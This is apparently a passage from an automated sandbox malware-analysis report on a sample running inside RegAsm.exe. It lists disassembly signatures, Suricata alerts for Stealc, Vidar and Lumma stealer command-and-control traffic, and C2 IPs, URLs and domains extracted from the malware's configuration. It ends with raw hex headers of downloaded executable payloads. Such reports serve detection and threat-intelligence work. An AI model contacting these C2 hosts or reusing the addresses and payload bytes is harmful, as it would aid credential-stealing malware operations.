Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 9_2_00416866
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+68h] 9_2_00447820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 9_2_0042B830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then xor eax, eax 9_2_0042B830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp eax 9_2_0042A8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-000000C0h] 9_2_0040F917
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esi+08h] 9_2_00412920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 9_2_00412920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ebx], al 9_2_00412920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp dword ptr [00451A70h] 9_2_0042E927
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 9_2_0043B9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+24h] 9_2_0042DA0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 9_2_00449A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h 9_2_0042DB4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 9_2_00404B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 9_2_00443B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp dword ptr [0045042Ch] 9_2_0041FB73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 9_2_00446BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov esi, ebx 9_2_00448BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ebx], al 9_2_00433BFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ebx], al 9_2_00433BFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 9_2_00449BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+54h] 9_2_0041FBB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 9_2_00420C4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 9_2_00446C5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 9_2_00405C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 9_2_0040FC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 9_2_00444C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 69F07BF2h 9_2_00427D03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h 9_2_00449D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 9_2_00449D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp eax, C0000004h 9_2_0041DDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_00443DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_0042EE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then jmp eax 9_2_00415E11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx eax, byte ptr [ebx+edx-06h] 9_2_00406E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then movzx esi, byte ptr [edx+ebp] 9_2_00406E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov esi, ebx 9_2_00448F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp] 9_2_0040DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov eax, dword ptr [esp+10h] 9_2_0040DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 9_2_00426FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ebx], al 9_2_00433F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then mov byte ptr [ebx], al 9_2_00433F92

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49775 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49777 -> 45.132.206.251:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49775 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.4:49775
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49775 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.4:49775
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49775 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.4:49744
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49742 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.4:49743
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49779 -> 104.21.16.12:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49767 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49779 -> 104.21.16.12:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49767 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49776 -> 104.21.17.174:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49786 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49786 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49776 -> 104.21.17.174:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49770 -> 172.67.184.196:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49792 -> 104.21.21.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49770 -> 172.67.184.196:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49772 -> 104.21.18.193:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49798 -> 104.21.16.12:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49792 -> 104.21.21.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49772 -> 104.21.18.193:443
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.4:49795
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49798 -> 104.21.16.12:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49791 -> 104.21.18.193:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49791 -> 104.21.18.193:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49766 -> 104.21.77.132:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49784 -> 104.21.77.132:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49784 -> 104.21.77.132:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49787 -> 172.67.152.190:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49787 -> 172.67.152.190:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49766 -> 104.21.77.132:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.4:49793
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49794 -> 104.21.17.174:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49794 -> 104.21.17.174:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49774 -> 104.21.21.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49774 -> 104.21.21.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49789 -> 172.67.184.196:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49789 -> 172.67.184.196:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.4:49806
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.4:49807
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49769 -> 172.67.152.190:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49769 -> 172.67.152.190:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://46.8.231.109/c4754d4f680ead72.php
Source: Malware configuration extractor URLs: questionsmw.stor
Source: Malware configuration extractor URLs: mysterisop.site
Source: Malware configuration extractor URLs: soldiefieop.site
Source: Malware configuration extractor URLs: treatynreit.site
Source: Malware configuration extractor URLs: absorptioniw.site
Source: Malware configuration extractor URLs: snarlypagowo.site
Source: Malware configuration extractor URLs: abnomalrkmu.site
Source: Malware configuration extractor URLs: chorusarorp.site
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199780418869
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 03:19:53 GMTContent-Type: application/octet-streamContent-Length: 391072Last-Modified: Tue, 01 Oct 2024 13:44:41 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfcc9-5f7a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9e 05 00 00 20 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 c0 05 00 00 04 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 be 05 00 00 00 00 00 48 00 00 00 02 00 05 00 40 ab 05 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 db 1f 5b 28 3c d4 73 54 10 77 2f a8 15 ea 9c c3 cd 78 7e 49 a5 1e d7 0f f4 a7 54 1e ec 97 54 35 51 3e d1 7a b9 93 2a f6 a2 f1 a1 62 fc 53 d6 a3 2f 8b 8d 87 8b 32 45 99 77 cb 3e ae a1 2f 8a 64 97 aa 74 5f f0 73 bf b2 97 bd 8e cf 07 88 6f 3e bd e6 ab cd b7 13 b9 e4 eb fd e3 0a ae f5 f0 8f b2 55 56 93 53 f9 99 0d dd bc ef 61 35 eb e4 4a 4b bc b1 bf a2 59 85 77 2e 8e 08 af 13 7f 23 89 17 ab df b4 73 e5 a8 22 b3 f6 7f e6 84 2d 64 04 08 2d 37 8d 9d 61 76 bc f6 6e d7 92 5c d4 09 fb 07 5d a9 df 1e 1e 8d 2e 9b 0a 8f b6 ee c3 4c 1d 14 ea 74 c9 13 ee 3a 32 6f 31 19 21 ad 12 c2 86 c1 f4 2a af fc 71 39 5f 4f b0 fd 06 0b a1 91 4b b3 5e 8d e1 f4 13 22 d3 c8 c3 29 30 da fe 2e 33 b0 92 24 ed 35 89 2c b5 8a 7d cc ff eb e0 9a 33 63 78 f5 7a b3 b5 ab 09 12 32 49 7d c7 fc 17 8f e1 dd d8 98 49 01 65 0a c9 1d 24 f1 84 98 20 2e d2 a0 8f bd d3 56 20 c3 ef 4f 47 80 bb f7 55 61 1e 24 2b d9 0e ef 25 5c 00 42 2d 9a 55 8
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 03:19:56 GMTContent-Type: application/octet-streamContent-Length: 423840Last-Modified: Tue, 01 Oct 2024 13:44:45 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfccd-677a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 20 06 00 00 06 00 00 00 00 00 00 ee 3e 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 a1 95 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 3e 06 00 53 00 00 00 00 40 06 00 42 02 00 00 00 00 00 00 00 00 00 00 78 51 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 60 3d 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 1e 06 00 00 20 00 00 00 20 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 40 06 00 00 04 00 00 00 22 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 3e 06 00 00 00 00 00 48 00 00 00 02 00 05 00 40 2b 06 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 42 2c d1 93 c8 4a 65 ad 38 b7 18 2a c6 c0 85 02 b3 e5 ca 58 66 dc e9 33 f5 0c 5a 6d 97 10 f4 76 07 24 3a be 9f dc 72 84 b7 89 d0 ea 1f 58 f2 1e 82 4d be cd 36 27 34 b2 db b6 2c ab 4f 97 54 df 13 fc 21 b2 07 42 0c da bf 43 98 7c f4 98 0d 9b 5b 05 7b 32 ae 79 e2 92 81 64 3f 31 64 32 a6 6d b5 be 84 92 cf 08 fd 55 35 41 39 fb 33 f1 42 dd 5b 6c d7 74 a6 a7 50 33 66 c5 41 2a 90 79 fb 7a 24 fd 5b 59 69 7f 06 96 ca 88 08 ca e7 11 99 a0 c1 f5 f4 5b e1 e1 76 ea 11 5c b7 1a 42 71 a1 ef 67 11 5e e9 91 ee f9 02 88 70 64 92 93 db 8c c5 7b 04 9f b0 92 74 05 7d e5 79 2a b4 e8 af 5b 50 c8 04 dc 0a 76 07 79 1e 48 07 20 ac e5 40 e7 27 32 e8 5e ab f8 34 dc 68 be b8 37 21 d4 b6 4f 80 77 d5 bc 4a 78 b5 ab 1d 69 e3 9e a4 e8 1a ab 76 a8 14 de b5 3f a1 47 d7 a4 36 5e e7 f9 05 60 ff 71 38 da c2 4e 5a b5 ab 2d 97 54 9a bf 96 75 ef 9a d0 92 f2 57 31 7a 1e 8b a0 fc 01 4b c7 b6 81 5f 9c c1 90 2a ff 16 37 1b 2d cb 1b a1 4
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 03:19:58 GMTContent-Type: application/octet-streamContent-Length: 344992Last-Modified: Tue, 01 Oct 2024 13:44:35 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfcc3-543a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ec 04 00 00 06 00 00 00 00 00 00 ee 0a 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 d7 37 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 0a 05 00 53 00 00 00 00 20 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 1d 05 00 28 26 00 00 00 40 05 00 0c 00 00 00 60 09 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ea 04 00 00 20 00 00 00 ec 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 20 05 00 00 04 00 00 00 ee 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 05 00 00 02 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0a 05 00 00 00 00 00 48 00 00 00 02 00 05 00 40 f7 04 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b3 b7 9b 2b 3e 4a 5d 96 cd ba 79 c2 0f 20 39 99 90 3d f3 1a fb 35 0c de 74 1b b6 a3 53 ed f2 34 3b 67 bd 2f 82 6b 1e 54 00 6c 9c 11 3e 47 50 f6 4f 43 95 42 07 24 d6 82 18 8d 21 9b 78 56 05 f5 d4 58 96 2c 9c 37 df 44 fd 71 52 59 da 96 d8 5c f0 38 09 fd 60 4d 1e 63 f6 1b a9 df 36 80 a4 a1 60 ec 98 16 98 44 36 62 79 f2 0e 65 3e 8b 54 79 8e 09 9b ed 22 6c 5a 44 3b bb 0f 14 36 86 ef d7 c6 b0 46 4e 36 54 c1 5e 3a 9e d1 a2 8d 7a eb ad 5f 18 27 89 01 5f 8f 13 d2 7f c4 cc ab 72 3b 80 1c c7 9e 6e 38 d4 0c 0b 55 61 a0 b3 3c de 44 38 cd b7 d3 34 f1 4f 76 5a d7 32 eb 6a 3b 6f 85 39 e4 e0 df a1 3b f7 61 ac 7d b9 79 81 52 d9 ae 89 04 cf d7 00 5c 8b 85 89 89 f0 c6 a2 60 32 93 66 76 ad 4a 02 43 96 2a 44 87 63 75 96 d5 27 dd 5e 2c 62 a3 ec 1c e5 05 1e 46 5e 49 86 02 65 04 d0 48 ae 4e 21 cd b4 8e ce 98 26 be ee 78 e5 12 44 8f ed c9 aa 02 22 82 91 e0 35 e9 06 e7 c4 bb 7a 03 4a a0 b1 73 45 b9 a6 88 d1 ea f6 c0 48 c
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 03:20:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 